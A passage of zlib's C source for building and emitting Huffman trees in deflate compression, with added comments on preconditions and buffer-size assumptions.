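    static_bl_desc.extra_bits = extra_blbits;
#endif

    /* Initialize the mapping length (0..255) -> length code (0..28) */
    length = 0;
    for (code = 0; code < LENGTH_CODES-1; code++) {
        base_length[code] = length;
        for (n = 0; n < (1 << extra_lbits[code]); n++) {
            _length_code[length++] = (uch)code;
        }
    }
    Assert (length == 256, "tr_static_init: length != 256");
    /* Note that the length 255 (match length 258) can be represented
     * in two different ways: code 284 + 5 bits or code 285, so we
     * overwrite length_code[255] to use the best encoding:
     */
    _length_code[length - 1] = (uch)code;

    /* Initialize the mapping dist (0..32K) -> dist code (0..29) */
    dist = 0;
    for (code = 0 ; code < 16; code++) {
        base_dist[code] = dist;
        for (n = 0; n < (1 << extra_dbits[code]); n++) {
            _dist_code[dist++] = (uch)code;
        }
    }
    Assert (dist == 256, "tr_static_init: dist != 256");
    dist >>= 7; /* from now on, all distances are divided by 128 */
    for ( ; code < D_CODES; code++) {
        base_dist[code] = dist << 7;
        for (n = 0; n < (1 << (extra_dbits[code] - 7)); n++) {
            _dist_code[256 + dist++] = (uch)code;
        }
    }
    Assert (dist == 256, "tr_static_init: 256 + dist != 512");

    /* Construct the codes of the static literal tree */
    for (bits = 0; bits <= MAX_BITS; bits++) bl_count[bits] = 0;
    n = 0;
    while (n <= 143) static_ltree[n++].Len = 8, bl_count[8]++;
    while (n <= 255) static_ltree[n++].Len = 9, bl_count[9]++;
    while (n <= 279) static_ltree[n++].Len = 7, bl_count[7]++;
    while (n <= 287) static_ltree[n++].Len = 8, bl_count[8]++;
    /* Codes 286 and 287 do not exist, but we must include them in the
     * tree construction to get a canonical Huffman tree (longest code
     * all ones)
     */
    gen_codes((ct_data *)static_ltree, L_CODES+1, bl_count);

    /* The static distance tree is trivial: */
    for (n = 0; n < D_CODES; n++) {
        static_dtree[n].Len = 5;
        static_dtree[n].Code = bi_reverse((unsigned)n, 5);
    }
    static_init_done = 1;

#  ifdef GEN_TREES_H
    gen_trees_header();
#  endif
#endif /* defined(GEN_TREES_H) || !defined(STDC) */
}

/* ===========================================================================
 * Generate the file trees.h describing the static trees.
 * The file is created (or truncated) as "trees.h" relative to the current
 * working directory, so this generator is meant to be run from the source
 * directory of a build tree the operator controls.
 */
#ifdef GEN_TREES_H
#  ifndef ZLIB_DEBUG
#    include <stdio.h>
#  endif

#  define SEPARATOR(i, last, width) \
      ((i) == (last)? "\n};\n\n" :    \
       ((i) % (width) == (width) - 1 ? ",\n" : ", "))

void gen_trees_header(void) {
    FILE *header = fopen("trees.h", "w");
    int i;

    Assert (header != NULL, "Can't open trees.h");
    /* Assert() comes from zutil.h and expands to nothing unless ZLIB_DEBUG
     * is defined, so the handle is tested explicitly: without this, a failed
     * fopen() would hand NULL to every fprintf() below.
     */
    if (header == NULL) {
        perror("trees.h");
        return;
    }
    fprintf(header,
            "/* header created automatically with -DGEN_TREES_H */\n\n");

    fprintf(header, "local const ct_data static_ltree[L_CODES+2] = {\n");
    for (i = 0; i < L_CODES+2; i++) {
        fprintf(header, "{{%3u},{%3u}}%s", static_ltree[i].Code,
                static_ltree[i].Len, SEPARATOR(i, L_CODES+1, 5));
    }

    fprintf(header, "local const ct_data static_dtree[D_CODES] = {\n");
    for (i = 0; i < D_CODES; i++) {
        fprintf(header, "{{%2u},{%2u}}%s", static_dtree[i].Code,
                static_dtree[i].Len, SEPARATOR(i, D_CODES-1, 5));
    }

    fprintf(header, "const uch ZLIB_INTERNAL _dist_code[DIST_CODE_LEN] = {\n");
    for (i = 0; i < DIST_CODE_LEN; i++) {
        fprintf(header, "%2u%s", _dist_code[i],
                SEPARATOR(i, DIST_CODE_LEN-1, 20));
    }

    fprintf(header,
        "const uch ZLIB_INTERNAL _length_code[MAX_MATCH-MIN_MATCH+1]= {\n");
    for (i = 0; i < MAX_MATCH-MIN_MATCH+1; i++) {
        fprintf(header, "%2u%s", _length_code[i],
                SEPARATOR(i, MAX_MATCH-MIN_MATCH, 20));
    }

    fprintf(header, "local const int base_length[LENGTH_CODES] = {\n");
    for (i = 0; i < LENGTH_CODES; i++) {
        fprintf(header, "%1u%s", base_length[i],
                SEPARATOR(i, LENGTH_CODES-1, 20));
    }

    fprintf(header, "local const int base_dist[D_CODES] = {\n");
    for (i = 0; i < D_CODES; i++) {
        fprintf(header, "%5u%s", base_dist[i],
                SEPARATOR(i, D_CODES-1, 10));
    }

    /* buffered write errors surface at close; report a truncated header */
    if (fclose(header) != 0) {
        perror("trees.h");
    }
}
#endif /* GEN_TREES_H */

/* ===========================================================================
 * Initialize a new block.
 * Clears every frequency counter, seeds END_BLOCK with a count of 1 and
 * resets the block's length totals and symbol counters.
 */
local void init_block(deflate_state *s) {
    int n; /* iterates over tree elements */

    /* Initialize the trees. */
    for (n = 0; n < L_CODES; n++) s->dyn_ltree[n].Freq = 0;
    for (n = 0; n < D_CODES; n++) s->dyn_dtree[n].Freq = 0;
    for (n = 0; n < BL_CODES; n++) s->bl_tree[n].Freq = 0;

    s->dyn_ltree[END_BLOCK].Freq = 1;
    s->opt_len = s->static_len = 0L;
    s->sym_next = s->matches = 0;
}

/* ===========================================================================
 * Initialize the tree data structures for a new zlib stream.
 * Binds the three tree descriptors in s to their dynamic arrays and static
 * descriptors, empties the bit buffer and starts the first block.
 */
void ZLIB_INTERNAL _tr_init(deflate_state *s) {
    tr_static_init();

    s->l_desc.dyn_tree = s->dyn_ltree;
    s->l_desc.stat_desc = &static_l_desc;

    s->d_desc.dyn_tree = s->dyn_dtree;
    s->d_desc.stat_desc = &static_d_desc;

    s->bl_desc.dyn_tree = s->bl_tree;
    s->bl_desc.stat_desc = &static_bl_desc;

    s->bi_buf = 0;
    s->bi_valid = 0;
#ifdef ZLIB_DEBUG
    s->compressed_len = 0L;
    s->bits_sent = 0L;
#endif

    /* Initialize the first block of the first file: */
    init_block(s);
}

#define SMALLEST 1
/* Index within the heap array of least frequent node in the Huffman tree */


/* ===========================================================================
 * Remove the smallest element from the heap and recreate the heap with
 * one less element. Updates heap and heap_len.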
*/
/* top receives the removed node index. The last heap slot is moved to the
 * root and sifted down with pqdownheap(). The macro does not test for an
 * empty heap; callers invoke it only while heap_len >= 1.
 */
#define pqremove(s, tree, top) \
{\
    top = s->heap[SMALLEST]; \
    s->heap[SMALLEST] = s->heap[s->heap_len--]; \
    pqdownheap(s, tree, SMALLEST); \
}

/* ===========================================================================
 * Compares two subtrees, using the tree depth as tie breaker when
 * the subtrees have equal frequency. This minimizes the worst case length.
 * n and m are evaluated more than once, so they must not have side effects.
 */
#define smaller(tree, n, m, depth) \
   (tree[n].Freq < tree[m].Freq || \
   (tree[n].Freq == tree[m].Freq && depth[n] <= depth[m]))

/* ===========================================================================
 * Restore the heap property by moving down the tree starting at node k,
 * exchanging a node with the smallest of its two sons if necessary, stopping
 * when the heap property is re-established (each father smaller than its
 * two sons).
 * s->heap holds node indices into tree; heap slot 1 is the root (see
 * SMALLEST) and the sons of slot k are slots 2k and 2k + 1.
 */
local void pqdownheap(deflate_state *s, ct_data *tree, int k) {
    int v = s->heap[k];    /* node being sifted down */
    int j = k << 1;  /* left son of k */
    while (j <= s->heap_len) {
        /* Set j to the smallest of the two sons: */
        if (j < s->heap_len &&
            smaller(tree, s->heap[j + 1], s->heap[j], s->depth)) {
            j++;
        }
        /* Exit if v is smaller than both sons */
        if (smaller(tree, v, s->heap[j], s->depth)) break;

        /* Exchange v with the smallest son */
        s->heap[k] = s->heap[j];  k = j;

        /* And continue down the tree, setting j to the left son of k */
        j <<= 1;
    }
    s->heap[k] = v;    /* final position of the sifted node */
}

/* ===========================================================================
 * Compute the optimal bit lengths for a tree and update the total bit length
 * for the current block.
 * IN assertion: the fields freq and dad are set, heap[heap_max] and
 * above are the tree nodes sorted by increasing frequency.
 * OUT assertions: the field len is set to the optimal bit length, the
 * array bl_count contains the frequencies for each bit length.
 * The length opt_len is updated; static_len is also updated if stree is
 * not null.
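*/
/* Lengths above max_length are clamped in the first pass and the excess is
 * redistributed afterwards, so on return no leaf has a Len above max_length.
 * gen_codes() depends on that bound when it indexes its per-length table.
 */
local void gen_bitlen(deflate_state *s, tree_desc *desc) {
    ct_data *tree        = desc->dyn_tree;
    int max_code         = desc->max_code;
    const ct_data *stree = desc->stat_desc->static_tree;
    const intf *extra    = desc->stat_desc->extra_bits;
    int base             = desc->stat_desc->extra_base;
    int max_length       = desc->stat_desc->max_length;
    int h;              /* heap index */
    int n, m;           /* iterate over the tree elements */
    int bits;           /* bit length */
    int xbits;          /* extra bits */
    ush f;              /* frequency */
    int overflow = 0;   /* number of elements with bit length too large */

    for (bits = 0; bits <= MAX_BITS; bits++) s->bl_count[bits] = 0;

    /* In a first pass, compute the optimal bit lengths (which may
     * overflow in the case of the bit length tree).
     */
    tree[s->heap[s->heap_max]].Len = 0; /* root of the heap */

    for (h = s->heap_max + 1; h < HEAP_SIZE; h++) {
        n = s->heap[h];
        bits = tree[tree[n].Dad].Len + 1;
        if (bits > max_length) bits = max_length, overflow++;
        tree[n].Len = (ush)bits;
        /* We overwrite tree[n].Dad which is no longer needed */

        if (n > max_code) continue; /* not a leaf node */

        s->bl_count[bits]++;
        xbits = 0;
        if (n >= base) xbits = extra[n - base];
        f = tree[n].Freq;
        s->opt_len += (ulg)f * (unsigned)(bits + xbits);
        if (stree) s->static_len += (ulg)f * (unsigned)(stree[n].Len + xbits);
    }
    if (overflow == 0) return;

    Tracev((stderr,"\nbit length overflow\n"));
    /* This happens for example on obj2 and pic of the Calgary corpus */

    /* Find the first bit length which could increase: */
    do {
        bits = max_length - 1;
        while (s->bl_count[bits] == 0) bits--;
        s->bl_count[bits]--;        /* move one leaf down the tree */
        s->bl_count[bits + 1] += 2; /* move one overflow item as its brother */
        s->bl_count[max_length]--;
        /* The brother of the overflow item also moves one step up,
         * but this does not affect bl_count[max_length]
         */
        overflow -= 2;
    } while (overflow > 0);

    /* Now recompute all bit lengths, scanning in increasing frequency.
     * h is still equal to HEAP_SIZE. (It is simpler to reconstruct all
     * lengths instead of fixing only the wrong ones. This idea is taken
     * from 'ar' written by Haruhiko Okumura.)
     */
    for (bits = max_length; bits != 0; bits--) {
        n = s->bl_count[bits];
        while (n != 0) {
            m = s->heap[--h];
            if (m > max_code) continue;
            if ((unsigned) tree[m].Len != (unsigned) bits) {
                Tracev((stderr,"code %d bits %d->%d\n", m, tree[m].Len, bits));
                s->opt_len += ((ulg)bits - tree[m].Len) * tree[m].Freq;
                tree[m].Len = (ush)bits;
            }
            n--;
        }
    }
}

#ifdef DUMP_BL_TREE
#  include <stdio.h>    /* fprintf() in the DUMP_BL_TREE trace below */
#endif

/* ===========================================================================
 * Construct one Huffman tree and assigns the code bit strings and lengths.
 * Update the total bit length for the current block.
 * IN assertion: the field freq is set for all tree elements.
 * OUT assertions: the fields len and code are set to the optimal bit length
 * and corresponding code. The length opt_len is updated; static_len is
 * also updated if stree is not null. The field max_code is set.
 * Internal nodes are numbered from elems upward, so tree, s->heap and
 * s->depth must all have room for them; their sizes are declared outside
 * this file.
 */
local void build_tree(deflate_state *s, tree_desc *desc) {
    ct_data *tree         = desc->dyn_tree;
    const ct_data *stree  = desc->stat_desc->static_tree;
    int elems             = desc->stat_desc->elems;
    int n, m;          /* iterate over heap elements */
    int max_code = -1; /* largest code with non zero frequency */
    int node;          /* new node being created */

    /* Construct the initial heap, with least frequent element in
     * heap[SMALLEST]. The sons of heap[n] are heap[2*n] and heap[2*n + 1].
     * heap[0] is not used.
     */
    s->heap_len = 0, s->heap_max = HEAP_SIZE;

    for (n = 0; n < elems; n++) {
        if (tree[n].Freq != 0) {
            s->heap[++(s->heap_len)] = max_code = n;
            s->depth[n] = 0;
        } else {
            tree[n].Len = 0;
        }
    }

    /* The pkzip format requires that at least one distance code exists,
     * and that at least one bit should be sent even if there is only one
     * possible code. So to avoid special checks later on we force at least
     * two codes of non zero frequency.
     */
    while (s->heap_len < 2) {
        node = s->heap[++(s->heap_len)] = (max_code < 2 ? ++max_code : 0);
        tree[node].Freq = 1;
        s->depth[node] = 0;
        s->opt_len--; if (stree) s->static_len -= stree[node].Len;
        /* node is 0 or 1 so it does not have extra bits */
    }
    desc->max_code = max_code;

    /* The elements heap[heap_len/2 + 1 .. heap_len] are leaves of the tree,
     * establish sub-heaps of increasing lengths:
     */
    for (n = s->heap_len/2; n >= 1; n--) pqdownheap(s, tree, n);

    /* Construct the Huffman tree by repeatedly combining the least two
     * frequent nodes.
     */
    node = elems;              /* next internal node of the tree */
    do {
        pqremove(s, tree, n);  /* n = node of least frequency */
        m = s->heap[SMALLEST]; /* m = node of next least frequency */

        s->heap[--(s->heap_max)] = n; /* keep the nodes sorted by frequency */
        s->heap[--(s->heap_max)] = m;

        /* Create a new node father of n and m */
        tree[node].Freq = tree[n].Freq + tree[m].Freq;
        s->depth[node] = (uch)((s->depth[n] >= s->depth[m] ?
                                s->depth[n] : s->depth[m]) + 1);
        tree[n].Dad = tree[m].Dad = (ush)node;
#ifdef DUMP_BL_TREE
        if (tree == s->bl_tree) {
            fprintf(stderr,"\nnode %d(%d), sons %d(%d) %d(%d)",
                    node, tree[node].Freq, n, tree[n].Freq, m, tree[m].Freq);
        }
#endif
        /* and insert the new node in the heap */
        s->heap[SMALLEST] = node++;
        pqdownheap(s, tree, SMALLEST);

    } while (s->heap_len >= 2);

    s->heap[--(s->heap_max)] = s->heap[SMALLEST];

    /* At this point, the fields freq and dad are set. We can now
     * generate the bit lengths.
     */
    gen_bitlen(s, (tree_desc *)desc);

    /* The field len is now set, we can generate the bit codes */
    gen_codes ((ct_data *)tree, max_code, s->bl_count);
}

/* ===========================================================================
 * Scan a literal or distance tree to determine the frequencies of the codes
 * in the bit length tree.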
*/
/* Walks tree[0..max_code].Len and counts, in s->bl_tree[].Freq, the literal
 * lengths and REP_3_6 / REPZ_3_10 / REPZ_11_138 repeat codes produced by
 * run-length grouping. send_tree() below uses the same grouping to emit them.
 * A guard value is stored in tree[max_code + 1].Len, so the array must have
 * at least max_code + 2 elements. curlen indexes s->bl_tree unchecked.
 */
local void scan_tree(deflate_state *s, ct_data *tree, int max_code) {
    int n;                     /* iterates over all tree elements */
    int prevlen = -1;          /* last emitted length */
    int curlen;                /* length of current code */
    int nextlen = tree[0].Len; /* length of next code */
    int count = 0;             /* repeat count of the current code */
    int max_count = 7;         /* max repeat count */
    int min_count = 4;         /* min repeat count */

    if (nextlen == 0) max_count = 138, min_count = 3;
    tree[max_code + 1].Len = (ush)0xffff; /* guard */

    for (n = 0; n <= max_code; n++) {
        curlen = nextlen; nextlen = tree[n + 1].Len;
        if (++count < max_count && curlen == nextlen) {
            continue;    /* run continues, keep counting */
        } else if (count < min_count) {
            /* run too short for a repeat code: count each length itself */
            s->bl_tree[curlen].Freq += count;
        } else if (curlen != 0) {
            if (curlen != prevlen) s->bl_tree[curlen].Freq++;
            s->bl_tree[REP_3_6].Freq++;
        } else if (count <= 10) {
            s->bl_tree[REPZ_3_10].Freq++;
        } else {
            s->bl_tree[REPZ_11_138].Freq++;
        }
        /* start a new run; the limits depend on the next length */
        count = 0; prevlen = curlen;
        if (nextlen == 0) {
            max_count = 138, min_count = 3;
        } else if (curlen == nextlen) {
            max_count = 6, min_count = 3;
        } else {
            max_count = 7, min_count = 4;
        }
    }
}

/* ===========================================================================
 * Send a literal or distance tree in compressed form, using the codes in
 * bl_tree.
*/
/* Emits the code lengths tree[0..max_code].Len with the same run-length
 * grouping that scan_tree() counted. It reads tree[max_code + 1].Len and
 * relies on the guard stored there by an earlier scan_tree() call on the
 * same tree. Output goes through send_code()/send_bits(), which assume the
 * pending buffer has room.
 */
local void send_tree(deflate_state *s, ct_data *tree, int max_code) {
    int n;                     /* iterates over all tree elements */
    int prevlen = -1;          /* last emitted length */
    int curlen;                /* length of current code */
    int nextlen = tree[0].Len; /* length of next code */
    int count = 0;             /* repeat count of the current code */
    int max_count = 7;         /* max repeat count */
    int min_count = 4;         /* min repeat count */

    /* tree[max_code + 1].Len = -1; */  /* guard already set */
    if (nextlen == 0) max_count = 138, min_count = 3;

    for (n = 0; n <= max_code; n++) {
        curlen = nextlen; nextlen = tree[n + 1].Len;
        if (++count < max_count && curlen == nextlen) {
            continue;    /* run continues, keep counting */
        } else if (count < min_count) {
            /* run too short for a repeat code: send each length itself */
            do { send_code(s, curlen, s->bl_tree); } while (--count != 0);

        } else if (curlen != 0) {
            if (curlen != prevlen) {
                send_code(s, curlen, s->bl_tree); count--;
            }
            Assert(count >= 3 && count <= 6, " 3_6?");
            send_code(s, REP_3_6, s->bl_tree); send_bits(s, count - 3, 2);

        } else if (count <= 10) {
            send_code(s, REPZ_3_10, s->bl_tree); send_bits(s, count - 3, 3);

        } else {
            send_code(s, REPZ_11_138, s->bl_tree); send_bits(s, count - 11, 7);
        }
        /* start a new run; the limits depend on the next length */
        count = 0; prevlen = curlen;
        if (nextlen == 0) {
            max_count = 138, min_count = 3;
        } else if (curlen == nextlen) {
            max_count = 6, min_count = 3;
        } else {
            max_count = 7, min_count = 4;
        }
    }
}

/* ===========================================================================
 * Construct the Huffman tree for the bit lengths and return the index in
 * bl_order of the last bit length code to send.
*/
/* Expects the literal and distance trees to be built already, because it
 * reads l_desc.max_code and d_desc.max_code. The returned index is never
 * below 3: the search loop stops there.
 */
local int build_bl_tree(deflate_state *s) {
    int max_blindex;  /* index of last bit length code of non zero freq */

    /* Determine the bit length frequencies for literal and distance trees */
    scan_tree(s, (ct_data *)s->dyn_ltree, s->l_desc.max_code);
    scan_tree(s, (ct_data *)s->dyn_dtree, s->d_desc.max_code);

    /* Build the bit length tree: */
    build_tree(s, (tree_desc *)(&(s->bl_desc)));
    /* opt_len now includes the length of the tree representations, except the
     * lengths of the bit lengths codes and the 5 + 5 + 4 bits for the counts.
     */

    /* Determine the number of bit length codes to send. The pkzip format
     * requires that at least 4 bit length codes be sent. (appnote.txt says
     * 3 but the actual value used is 4.)
     */
    for (max_blindex = BL_CODES-1; max_blindex >= 3; max_blindex--) {
        if (s->bl_tree[bl_order[max_blindex]].Len != 0) break;
    }
    /* Update opt_len to include the bit length tree and counts */
    s->opt_len += 3*((ulg)max_blindex + 1) + 5 + 5 + 4;
    Tracev((stderr, "\ndyn trees: dyn %ld, stat %ld",
            s->opt_len, s->static_len));

    return max_blindex;
}

/* ===========================================================================
 * Send the header for a block using dynamic Huffman trees: the counts, the
 * lengths of the bit length codes, the literal tree and the distance tree.
 * IN assertion: lcodes >= 257, dcodes >= 1, blcodes >= 4.
*/
/* The three counts are written as lcodes - 257 (5 bits), dcodes - 1 (5 bits)
 * and blcodes - 4 (4 bits). The range checks below are Assert() calls only.
 */
local void send_all_trees(deflate_state *s, int lcodes, int dcodes,
                          int blcodes) {
    int rank;                    /* index in bl_order */

    Assert (lcodes >= 257 && dcodes >= 1 && blcodes >= 4, "not enough codes");
    Assert (lcodes <= L_CODES && dcodes <= D_CODES && blcodes <= BL_CODES,
            "too many codes");
    Tracev((stderr, "\nbl counts: "));
    send_bits(s, lcodes - 257, 5);  /* not +255 as stated in appnote.txt */
    send_bits(s, dcodes - 1,   5);
    send_bits(s, blcodes - 4,  4);  /* not -3 as stated in appnote.txt */
    for (rank = 0; rank < blcodes; rank++) {
        Tracev((stderr, "\nbl code %2d ", bl_order[rank]));
        send_bits(s, s->bl_tree[bl_order[rank]].Len, 3);
    }
    Tracev((stderr, "\nbl tree: sent %ld", s->bits_sent));

    send_tree(s, (ct_data *)s->dyn_ltree, lcodes - 1);  /* literal tree */
    Tracev((stderr, "\nlit tree: sent %ld", s->bits_sent));

    send_tree(s, (ct_data *)s->dyn_dtree, dcodes - 1);  /* distance tree */
    Tracev((stderr, "\ndist tree: sent %ld", s->bits_sent));
}

/* ===========================================================================
 * Send a stored block
 * Writes the 3-bit block header, pads to a byte boundary, writes the length
 * and its one's complement as 16-bit values, then copies stored_len bytes
 * from buf into pending_buf.
 * NOTE(review): nothing here checks that stored_len fits in 16 bits or that
 * pending_buf has room for stored_len + 4 more bytes; both must be ensured
 * by the caller. buf is only dereferenced when stored_len is non-zero.
 */
void ZLIB_INTERNAL _tr_stored_block(deflate_state *s, charf *buf,
                                    ulg stored_len, int last) {
    send_bits(s, (STORED_BLOCK<<1) + last, 3);  /* send block type */
    bi_windup(s);        /* align on byte boundary */
    put_short(s, (ush)stored_len);     /* LEN, truncated to 16 bits */
    put_short(s, (ush)~stored_len);    /* NLEN, one's complement of LEN */
    if (stored_len)
        zmemcpy(s->pending_buf + s->pending, (Bytef *)buf, stored_len);
    s->pending += stored_len;
#ifdef ZLIB_DEBUG
    s->compressed_len = (s->compressed_len + 3 + 7) & (ulg)~7L;
    s->compressed_len += (stored_len + 4) << 3;
    s->bits_sent += 2*16;
    s->bits_sent += stored_len << 3;
#endif
}

/* ===========================================================================
 * Flush the bits in the bit buffer to pending output (leaves at most 7 bits)
 */
void ZLIB_INTERNAL _tr_flush_bits(deflate_state *s) {
    bi_flush(s);
}

/* ===========================================================================
 * Send one empty static block to give enough lookahead for inflate.
* This takes 10 bits, of which 7 may remain in the bit buffer.
 */
void ZLIB_INTERNAL _tr_align(deflate_state *s) {
    send_bits(s, STATIC_TREES<<1, 3);
    send_code(s, END_BLOCK, static_ltree);
#ifdef ZLIB_DEBUG
    s->compressed_len += 10L; /* 3 for block type, 7 for EOB */
#endif
    bi_flush(s);
}

/* ===========================================================================
 * Send the block data compressed using the given Huffman trees
 * Symbols are read back from s->sym_buf as three bytes each: distance low
 * byte, distance high byte, then the literal or match length, the layout
 * that _tr_tally() writes. Reading stops at s->sym_next.
 * The check that the output has not overrun the symbol buffer is an Assert()
 * only, so the buffer sizing done outside this file is what keeps the two
 * regions apart.
 */
local void compress_block(deflate_state *s, const ct_data *ltree,
                          const ct_data *dtree) {
    unsigned dist;      /* distance of matched string */
    int lc;             /* match length or unmatched char (if dist == 0) */
    unsigned sx = 0;    /* running index in sym_buf */
    unsigned code;      /* the code to send */
    int extra;          /* number of extra bits to send */

    if (s->sym_next != 0) do {
        dist = s->sym_buf[sx++] & 0xff;
        dist += (unsigned)(s->sym_buf[sx++] & 0xff) << 8;
        lc = s->sym_buf[sx++];
        if (dist == 0) {
            send_code(s, lc, ltree); /* send a literal byte */
            Tracecv(isgraph(lc), (stderr," '%c' ", lc));
        } else {
            /* Here, lc is the match length - MIN_MATCH */
            code = _length_code[lc];
            send_code(s, code + LITERALS + 1, ltree);   /* send length code */
            extra = extra_lbits[code];
            if (extra != 0) {
                lc -= base_length[code];
                send_bits(s, lc, extra);       /* send the extra length bits */
            }
            dist--; /* dist is now the match distance - 1 */
            code = d_code(dist);
            Assert (code < D_CODES, "bad d_code");

            send_code(s, code, dtree);       /* send the distance code */
            extra = extra_dbits[code];
            if (extra != 0) {
                dist -= (unsigned)base_dist[code];
                send_bits(s, dist, extra);   /* send the extra distance bits */
            }
        } /* literal or match pair ? */

        /* Check that the overlay between pending_buf and sym_buf is ok: */
        Assert(s->pending < s->lit_bufsize + sx, "pendingBuf overflow");

    } while (sx < s->sym_next);

    send_code(s, END_BLOCK, ltree);
}

/* ===========================================================================
 * Check if the data type is TEXT or BINARY, using the following algorithm:
 * - TEXT if the two conditions below are satisfied:
 *    a) There are no non-portable control characters belonging to the
 *       "block list" (0..6, 14..25, 28..31).
 *    b) There is at least one printable character belonging to the
 *       "allow list" (9 {TAB}, 10 {LF}, 13 {CR}, 32..255).
 * - BINARY otherwise.
 * - The following partially-portable control characters form a
 *   "gray list" that is ignored in this detection algorithm:
 *   (7 {BEL}, 8 {BS}, 11 {VT}, 12 {FF}, 26 {SUB}, 27 {ESC}).
 * IN assertion: the fields Freq of dyn_ltree are set.
 * The result is a heuristic computed from byte frequencies of the current
 * block only; it says nothing else about the content.
 */
local int detect_data_type(deflate_state *s) {
    /* block_mask is the bit mask of block-listed bytes
     * set bits 0..6, 14..25, and 28..31
     * 0xf3ffc07f = binary 11110011111111111100000001111111
     */
    unsigned long block_mask = 0xf3ffc07fUL;
    int n;

    /* Check for non-textual ("block-listed") bytes. */
    for (n = 0; n <= 31; n++, block_mask >>= 1)
        if ((block_mask & 1) && (s->dyn_ltree[n].Freq != 0))
            return Z_BINARY;

    /* Check for textual ("allow-listed") bytes. */
    if (s->dyn_ltree[9].Freq != 0 || s->dyn_ltree[10].Freq != 0
            || s->dyn_ltree[13].Freq != 0)
        return Z_TEXT;
    for (n = 32; n < LITERALS; n++)
        if (s->dyn_ltree[n].Freq != 0)
            return Z_TEXT;

    /* There are no "block-listed" or "allow-listed" bytes:
     * this stream either is empty or has tolerated ("gray-listed") bytes only.
     */
    return Z_BINARY;
}

/* ===========================================================================
 * Determine the best encoding for the current block: dynamic trees, static
 * trees or store, and write out the encoded block.
*/
/* buf is the input block (it may be NULL, in which case a stored block is
 * not an option), stored_len its length and last is non-zero for the final
 * block of the stream. After the block is written the per-block statistics
 * are reset with init_block(); on the last block the bit buffer is also
 * flushed to a byte boundary.
 */
void ZLIB_INTERNAL _tr_flush_block(deflate_state *s, charf *buf,
                                   ulg stored_len, int last) {
    ulg opt_lenb, static_lenb; /* opt_len and static_len in bytes */
    int max_blindex = 0;  /* index of last bit length code of non zero freq */

    /* Build the Huffman trees unless a stored block is forced */
    if (s->level > 0) {

        /* Check if the file is binary or text */
        if (s->strm->data_type == Z_UNKNOWN)
            s->strm->data_type = detect_data_type(s);

        /* Construct the literal and distance trees */
        build_tree(s, (tree_desc *)(&(s->l_desc)));
        Tracev((stderr, "\nlit data: dyn %ld, stat %ld", s->opt_len,
                s->static_len));

        build_tree(s, (tree_desc *)(&(s->d_desc)));
        Tracev((stderr, "\ndist data: dyn %ld, stat %ld", s->opt_len,
                s->static_len));
        /* At this point, opt_len and static_len are the total bit lengths of
         * the compressed block data, excluding the tree representations.
         */

        /* Build the bit length tree for the above two trees, and get the index
         * in bl_order of the last bit length code to send.
         */
        max_blindex = build_bl_tree(s);

        /* Determine the best encoding. Compute the block lengths in bytes. */
        opt_lenb = (s->opt_len + 3 + 7) >> 3;
        static_lenb = (s->static_len + 3 + 7) >> 3;

        Tracev((stderr, "\nopt %lu(%lu) stat %lu(%lu) stored %lu lit %u ",
                opt_lenb, s->opt_len, static_lenb, s->static_len, stored_len,
                s->sym_next / 3));

        /* with FORCE_STATIC the condition is compiled out and the static
         * length is always taken
         */
#ifndef FORCE_STATIC
        if (static_lenb <= opt_lenb || s->strategy == Z_FIXED)
#endif
            opt_lenb = static_lenb;

    } else {
        Assert(buf != (char*)0, "lost buf");
        opt_lenb = static_lenb = stored_len + 5; /* force a stored block */
    }

#ifdef FORCE_STORED
    if (buf != (char*)0) { /* force stored block */
#else
    if (stored_len + 4 <= opt_lenb && buf != (char*)0) {
                       /* 4: two words for the lengths */
#endif
        /* The test buf != NULL is only necessary if LIT_BUFSIZE > WSIZE.
         * Otherwise we can't have processed more than WSIZE input bytes since
         * the last block flush, because compression would have been
         * successful. If LIT_BUFSIZE <= WSIZE, it is never too late to
         * transform a block into a stored block.
         */
        _tr_stored_block(s, buf, stored_len, last);

    } else if (static_lenb == opt_lenb) {
        send_bits(s, (STATIC_TREES<<1) + last, 3);
        compress_block(s, (const ct_data *)static_ltree,
                       (const ct_data *)static_dtree);
#ifdef ZLIB_DEBUG
        s->compressed_len += 3 + s->static_len;
#endif
    } else {
        send_bits(s, (DYN_TREES<<1) + last, 3);
        send_all_trees(s, s->l_desc.max_code + 1, s->d_desc.max_code + 1,
                       max_blindex + 1);
        compress_block(s, (const ct_data *)s->dyn_ltree,
                       (const ct_data *)s->dyn_dtree);
#ifdef ZLIB_DEBUG
        s->compressed_len += 3 + s->opt_len;
#endif
    }
    Assert (s->compressed_len == s->bits_sent, "bad compressed size");
    /* The above check is made mod 2^32, for files larger than 512 MB
     * and uLong implemented on 32 bits.
     */
    init_block(s);

    if (last) {
        bi_windup(s);
#ifdef ZLIB_DEBUG
        s->compressed_len += 7;  /* align on byte boundary */
#endif
    }
    Tracev((stderr,"\ncomprlen %lu(%lu) ", s->compressed_len >> 3,
           s->compressed_len - 7*last));
}

/* ===========================================================================
 * Save the match info and tally the frequency counts. Return true if
 * the current block must be flushed.
*/
int ZLIB_INTERNAL _tr_tally(deflate_state *s, unsigned dist, unsigned lc) {
    /* Each tallied symbol takes three bytes of sym_buf: distance low byte,
     * distance high byte, then lc. No bounds check is made here; the return
     * value tells the caller when sym_next has reached sym_end.
     */
    s->sym_buf[s->sym_next] = (uch)dist;
    s->sym_buf[s->sym_next + 1] = (uch)(dist >> 8);
    s->sym_buf[s->sym_next + 2] = (uch)lc;
    s->sym_next += 3;

    if (dist != 0) {
        /* A match: lc is the match length - MIN_MATCH */
        s->matches++;
        dist--;             /* dist = match distance - 1 */
        Assert((ush)dist < (ush)MAX_DIST(s) &&
               (ush)lc <= (ush)(MAX_MATCH-MIN_MATCH) &&
               (ush)d_code(dist) < (ush)D_CODES,  "_tr_tally: bad match");

        s->dyn_ltree[_length_code[lc] + LITERALS + 1].Freq++;
        s->dyn_dtree[d_code(dist)].Freq++;
    } else {
        /* A literal: lc is the unmatched char */
        s->dyn_ltree[lc].Freq++;
    }
    return (s->sym_next == s->sym_end);
}
